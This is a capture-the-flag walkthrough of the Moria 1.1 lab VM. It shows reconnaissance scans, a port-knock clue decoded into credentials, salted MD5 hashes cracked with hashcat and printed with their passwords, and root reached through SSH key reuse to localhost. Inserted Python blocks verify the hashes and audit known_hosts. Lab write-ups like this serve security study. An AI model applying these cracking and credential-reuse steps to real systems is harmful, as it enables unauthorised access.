CTF Walkthrough: Moria 1.1

Before I get started, I would like to clarify that this challenge is less hacking (no exploits or anything of that nature needed) and more capture the flag, where each step gives you a clue to get to the next step. This one drove me nuts in a couple of spots, and because I wasn’t in the right mindset going in, I did ask a friend who had completed it for a hint. Twice. Each time he was able to say something that got me back on track; I was pretty much overthinking it each time.

Anyway, off we go, let’s get started with Moria 1.1, available at VulnHub. The goal of this challenge is to get root and read the flag.

Also, to be completely transparent, I spent a lot of time going down dead ends on this one, and I’m only (mostly) writing up the proper ways to get through this challenge to keep it simple and straightforward.

As always, we start with port discovery.

root@kali:~# nmap -A -T4 -sS 10.13.37.207

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-11 21:52 EST
Nmap scan report for 10.13.37.207
Host is up (0.00052s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
22/tcp open  ssh     OpenSSH 6.6.1 (protocol 2.0)
| ssh-hostkey: 
|   2048 47:b5:ed:e3:f9:ad:96:88:c0:f2:83:23:7f:a3:d3:4f (RSA)
|   256 85:cd:a2:d8:bb:85:f6:0f:4e:ae:8c:aa:73:52:ec:63 (ECDSA)
|_  256 b1:77:7e:08:b3:a0:84:f8:f4:5d:f9:8e:d5:85:b9:34 (EdDSA)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Gates of Moria
MAC Address: 08:00:27:E5:47:B0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.52 ms 10.13.37.207

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.88 seconds

Let’s poke at FTP first (I didn’t do this in exactly this order myself, but it makes more sense this way).

root@kali:~# ftp 10.13.37.207
Connected to 10.13.37.207.
220 Welcome Balrog!
Name (10.13.37.207:root): 

Welcome Balrog? Is that my name now? Sure, I’ll be Balrog. Unfortunately no password that I tried worked (of course), but we’ll just keep this in mind for later.

Opening port 80 in a browser shows us just an image. Being a LOTR fan, I immediately recognize it as a drawing of the magical door into the Dwarf caves. Gandalf had to say “friend” in Elvish to enter, which is “Mellon”, which is basically what the text says. (Yes, I tried, and no, “Mellon” is not a password, not exactly anyway, but we’ll get there.) The source for the page reveals nothing of interest.

So let’s run gobuster on it.

root@kali:~# gobuster -u http://10.13.37.207 -w /usr/share/wordlists/dirb/big.txt 

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.13.37.207/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirb/big.txt
[+] Status codes : 204,301,302,307,200
=====================================================
/w (Status: 301)
=====================================================

And then open http://10.13.37.207/w in the browser. And then http://10.13.37.207/w/h, and then http://10.13.37.207/w/h/i, etc, etc, etc, until we end up here:

It looks like refreshing this page will pick one of these messages at random.

Balin: "Be quiet, the Balrog will hear you!" 
Telchar to Thrain:"That human is slow, don't give up yet" 
"Eru! Save us!" 
Ori:"Will anyone hear us?" 
Maeglin:"The Balrog is not around, hurry!" 
"We will die here.." 
Nain:"Will the human get the message?" 
Fundin:"That human will never save us!" 
"Knock knock" 
Oin:"Stop knocking!" 
"Is this the end?" 
"Too loud!" 

Hmmmm, “Knock knock”? Message? Too loud? Balrog will hear you? (Remember, FTP called us Balrog.) So they’re doing something that they’re afraid I will hear? Maybe I need to listen to something. But what can I do to listen to something the server is doing?

I thought maybe there should be some port knocking to open up a service/port on the server, so I ran the following to knock on those eight ports in order.

for x in 77 101 108 108 111 110 54 57; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x 10.13.37.207; done

Another nmap scan showed nothing new, but eventually I realized that those numbers fall in the ASCII range, whereas port knocking could go up to port 65535. So I converted those numbers to ASCII characters and ended up with “Mellon69”. (“Mellon” is Elvish for “friend”, which is mentioned in the image of the gate from the index page on port 80.)

So now we have a potential user name (Balrog), and maybe a password (Mellon69). So let’s try to use SSH.

root@kali:~# ssh Balrog@10.13.37.207
Balrog@10.13.37.207's password: Mellon69
Last login: Sat Nov 11 11:09:26 2017

WRONG GATE!

Connection to 10.13.37.207 closed.

Okay, that seems like a clue, and that seems like a valid account at least. I checked the browser (the picture of the gate), no change, so let’s try this same account information with FTP.

root@kali:~# ftp 10.13.37.207
Connected to 10.13.37.207.
220 Welcome Balrog!
Name (10.13.37.207:root): Balrog
331 Please specify the password.
Password: Mellon69
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

Nice, we’re in. I poked around for an embarrassingly long time before getting the bright idea to look in the web root to see if there was anything gobuster didn’t pick up.

ftp> cd /var/www/html/
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0              23 Mar 12  2017 QlVraKW4fbIkXau9zkAPNGzviT3UKntl
-r--------    1 48       48             85 Mar 12  2017 index.php
-r--------    1 48       48         161595 Mar 11  2017 moria.jpg
drwxr-xr-x    3 0        0              15 Mar 12  2017 w
226 Directory send OK.

Yyyyyup. Let’s go there (and view the source).

<style type="text/css">
.tg  {border-collapse:collapse;border-spacing:0;}
.tg td{font-family:Arial, sans-serif;font-size:14px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;}
.tg th{font-family:Arial, sans-serif;font-size:14px;font-weight:normal;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;}
.tg .tg-yw4l{vertical-align:top}
</style>
<table class="tg">
  <tr>
    <th class="tg-yw4l"><b>Prisoner's name</b><br></th>
    <th class="tg-yw4l"><b>Passkey</b></th>
  </tr>
  <tr>
    <td class="tg-yw4l">Balin<br></td>
    <td class="tg-yw4l">c2d8960157fc8540f6d5d66594e165e0</td>
  </tr>
  <tr>
    <td class="tg-yw4l">Oin</td>
    <td class="tg-yw4l">727a279d913fba677c490102b135e51e</td>
  </tr>
  <tr>
    <td class="tg-yw4l">Ori</td>
    <td class="tg-yw4l">8c3c3152a5c64ffb683d78efc3520114</td>
  </tr>
  <tr>
    <td class="tg-yw4l">Maeglin</td>
    <td class="tg-yw4l">6ba94d6322f53f30aca4f34960203703</td>
  </tr>
  <tr>
    <td class="tg-yw4l">Fundin</td>
    <td class="tg-yw4l">c789ec9fae1cd07adfc02930a39486a1</td>
  </tr>
  <tr>
    <td class="tg-yw4l">Nain</td>
    <td class="tg-yw4l">fec21f5c7dcf8e5e54537cfda92df5fe</td>
  </tr>
  <tr>
    <td class="tg-yw4l">Dain</td>
    <td class="tg-yw4l">6a113db1fd25c5501ec3a5936d817c29</td>
  </tr>
  <tr>
    <td class="tg-yw4l">Thrain</td>
    <td class="tg-yw4l">7db5040c351237e8332bfbba757a1019</td>
  </tr>
  <tr>
    <td class="tg-yw4l">Telchar</td>
    <td class="tg-yw4l">dd272382909a4f51163c77da6356cc6f</td>
  </tr>
</table>

<!--

6MAp84
bQkChe
HnqeN4
e5ad5s
g9Wxv7
HCCsxP
cC5nTr
h8spZR
tb9AWe

MD5(MD5(Password).Salt)

-->

Okay, a list of usernames and hashed passwords. Also a very useful bit of information in the comment. Basically the author took the password, hashed it with MD5, appended a random six-character string (the salt), and then ran the result through MD5 again. I did quite a bit of Google searching to find the easiest way to crack this (did you know Google results span multiple pages? I think I went to “Page 2” for this), before I found that hashcat has a mode built in that will handle this. So let’s set up a text file with the hashes and salts in a form hashcat can understand (hash:salt, one per line).

dd272382909a4f51163c77da6356cc6f:tb9AWe
727a279d913fba677c490102b135e51e:bQkChe
6ba94d6322f53f30aca4f34960203703:e5ad5s
8c3c3152a5c64ffb683d78efc3520114:HnqeN4
6a113db1fd25c5501ec3a5936d817c29:cC5nTr
c2d8960157fc8540f6d5d66594e165e0:6MAp84
7db5040c351237e8332bfbba757a1019:h8spZR
fec21f5c7dcf8e5e54537cfda92df5fe:HCCsxP
c789ec9fae1cd07adfc02930a39486a1:g9Wxv7

The mode we’ll want to use is 2611, hashcat’s md5(md5($pass).$salt) mode.

root@kali:~/CTF/Moria# hashcat -m 2611 --force --show accounts.txt /usr/share/wordlists/rockyou.txt
dd272382909a4f51163c77da6356cc6f:tb9AWe:magic
727a279d913fba677c490102b135e51e:bQkChe:rainbow
6ba94d6322f53f30aca4f34960203703:e5ad5s:fuckoff
8c3c3152a5c64ffb683d78efc3520114:HnqeN4:spanky
6a113db1fd25c5501ec3a5936d817c29:cC5nTr:abcdef
c2d8960157fc8540f6d5d66594e165e0:6MAp84:flower
7db5040c351237e8332bfbba757a1019:h8spZR:darkness
fec21f5c7dcf8e5e54537cfda92df5fe:HCCsxP:warrior
c789ec9fae1cd07adfc02930a39486a1:g9Wxv7:hunter2

And matching up the results with the account names yields the following:

Balin:flower
Oin:rainbow
Ori:spanky
Maeglin:fuckoff
Fundin:hunter2
Nain:warrior
Dain:abcdef
Thrain:darkness
Telchar:magic
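As an added example (not code from the original post), here is the MD5(MD5(Password).Salt) scheme recomputed in Python, with the hashcat --show lines joined back to the account names so each cracked password is verified against the table rather than matched by eye. The hashes, salts and hashcat output are the ones shown above.

```python
import hashlib

# Stored hashes from the page's table and salts from its HTML comment
# (the comment lists the salts in the same order as the table rows).
HASHES = {
    "Balin": "c2d8960157fc8540f6d5d66594e165e0", "Oin": "727a279d913fba677c490102b135e51e",
    "Ori": "8c3c3152a5c64ffb683d78efc3520114", "Maeglin": "6ba94d6322f53f30aca4f34960203703",
    "Fundin": "c789ec9fae1cd07adfc02930a39486a1", "Nain": "fec21f5c7dcf8e5e54537cfda92df5fe",
    "Dain": "6a113db1fd25c5501ec3a5936d817c29", "Thrain": "7db5040c351237e8332bfbba757a1019",
    "Telchar": "dd272382909a4f51163c77da6356cc6f",
}
SALTS = {
    "Balin": "6MAp84", "Oin": "bQkChe", "Ori": "HnqeN4", "Maeglin": "e5ad5s", "Fundin": "g9Wxv7",
    "Nain": "HCCsxP", "Dain": "cC5nTr", "Thrain": "h8spZR", "Telchar": "tb9AWe",
}
# hashcat --show output as printed above: hash:salt:password
CRACKED = """\
dd272382909a4f51163c77da6356cc6f:tb9AWe:magic
727a279d913fba677c490102b135e51e:bQkChe:rainbow
6ba94d6322f53f30aca4f34960203703:e5ad5s:fuckoff
8c3c3152a5c64ffb683d78efc3520114:HnqeN4:spanky
6a113db1fd25c5501ec3a5936d817c29:cC5nTr:abcdef
c2d8960157fc8540f6d5d66594e165e0:6MAp84:flower
7db5040c351237e8332bfbba757a1019:h8spZR:darkness
fec21f5c7dcf8e5e54537cfda92df5fe:HCCsxP:warrior
c789ec9fae1cd07adfc02930a39486a1:g9Wxv7:hunter2
"""

def vbulletin_hash(password: str, salt: str) -> str:
    """MD5(MD5(password).salt) as hashcat mode 2611 computes it: the inner digest
    is appended as its 32-char lowercase hex string, not raw bytes, then hashed again."""
    inner = hashlib.md5(password.encode()).hexdigest()
    return hashlib.md5((inner + salt).encode()).hexdigest()

def verify(name: str, password: str) -> bool:
    """True if the candidate password reproduces the stored hash for this account."""
    return vbulletin_hash(password, SALTS[name]) == HASHES[name]

def match_cracked_to_names(cracked_text: str) -> dict:
    """Join hashcat's hash:salt:password lines back to account names, keeping only
    entries whose password really reproduces the stored hash."""
    by_hash = {h: name for name, h in HASHES.items()}
    creds = {}
    for line in cracked_text.strip().splitlines():
        h, salt, password = line.split(":", 2)  # a password may itself contain ':'
        name = by_hash.get(h)
        if name is not None and salt == SALTS[name] and verify(name, password):
            creds[name] = password
    return creds
```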

Let’s go ahead and give these accounts a shot. (Skipping all the ones that didn’t work, because that’s boring.)

root@kali:~/CTF/Moria# ssh Ori@10.13.37.207
Ori@10.13.37.207's password: spanky
Last login: Sat Nov 11 17:12:27 2017 from ::1
-bash-4.2$ id
uid=1002(Ori) gid=1003(notBalrog) groups=1003(notBalrog)

Nice, we’re in! Hopefully we’re almost done, this one is taking me a while to get through!

Okay, I spent a long time here. I tried running a ton of privilege escalation cracks, shortcuts, hacks, anything I could think of, but nothing worked. Eventually I asked my friend for a clue, and he pointed me in the right direction, telling me to look in ~/.ssh/known_hosts. I had of course already looked at this file, but I failed to notice the irregularity in it.

Basically, if you see 127.0.0.1 (or localhost) in that file, then that user has used SSH to connect to the machine’s own SSH server from the machine itself. The only reasons to do that are to test the SSH server, or maybe to log in as root if the current user can’t sudo?
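That clue is also something an administrator can audit for. As an added example (not from the original post), here is a small Python script that parses a known_hosts file, including entries hashed with HashKnownHosts, and flags any that point at the local machine. The sample file content is constructed, the key blobs are shortened placeholders, and the salt is an arbitrary 20-byte constant.

```python
import base64
import hashlib
import hmac

LOOPBACK = ("127.0.0.1", "localhost", "::1")

def hash_host(host: str, salt: bytes) -> str:
    """Build an OpenSSH hashed host field '|1|<salt>|<hmac>' (HashKnownHosts yes):
    the hash is HMAC-SHA1 keyed with the 20-byte salt over the hostname."""
    mac = hmac.new(salt, host.encode(), hashlib.sha1).digest()
    return "|1|%s|%s" % (base64.b64encode(salt).decode(), base64.b64encode(mac).decode())

def hashed_host_matches(field: str, host: str) -> bool:
    """Test whether a hashed host field refers to the given hostname."""
    parts = field.split("|")
    if len(parts) != 4 or parts[1] != "1":
        return False
    salt, digest = base64.b64decode(parts[2]), base64.b64decode(parts[3])
    expected = hmac.new(salt, host.encode(), hashlib.sha1).digest()
    return hmac.compare_digest(digest, expected)

def loopback_entries(known_hosts_text: str) -> list:
    """Return (line_number, host) for every entry that points at the local machine,
    whether the host field is plain, comma-separated, [host]:port, or hashed."""
    hits = []
    for lineno, line in enumerate(known_hosts_text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):  # @cert-authority / @revoked marker precedes the host field
            line = line.split(None, 1)[1]
        hosts_field = line.split()[0]
        if hosts_field.startswith("|1|"):
            candidates = [lb for lb in LOOPBACK if hashed_host_matches(hosts_field, lb)]
        else:
            bare = [h[1:].split("]:")[0] if h.startswith("[") else h for h in hosts_field.split(",")]
            candidates = [h for h in bare if h in LOOPBACK]
        if candidates:
            hits.append((lineno, candidates[0]))
    return hits

# Constructed sample (not the VM's file): a plain loopback entry like the one on the page,
# a hashed entry for localhost, and an unrelated host. Key blobs are shortened placeholders.
SAMPLE_KNOWN_HOSTS = "\n".join([
    "127.0.0.1 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTY=",
    hash_host("localhost", b"0123456789abcdef0123") + " ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHplcm8=",
    "[10.13.37.1]:2222 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC=",
])
```

Run against each user’s ~/.ssh/known_hosts, a non-empty result is the same irregularity the walkthrough spots by eye.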

-bash-4.2$ cat ~/.ssh/known_hosts
127.0.0.1 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCuLX/CWxsOhekXJRxQqQH/Yx0SD+XgUpmlmWN1Y8cvmCYJslOh4vE+I6fmMwCdBfi4W061RmFc+vMALlQUYNz0=
-bash-4.2$ ssh root@127.0.0.1 -i ~/.ssh/id_rsa
Last login: Sat Nov 11 17:15:09 2017 from 127.0.0.1
[root@Moria ~]# id
uid=0(root) gid=0(root) groups=0(root)
[root@Moria ~]# cat /root/flag.txt 
“All that is gold does not glitter,
Not all those who wander are lost;
The old that is strong does not wither,
Deep roots are not reached by the frost.

From the ashes a fire shall be woken,
A light from the shadows shall spring;
Renewed shall be blade that was broken,
The crownless again shall be king.” 

All That is Gold Does Not Glitter by J. R. R. Tolkien

I hope you suff.. enjoyed this VM. It wasn't so hard, was it?
-Abatchy

Bedtime.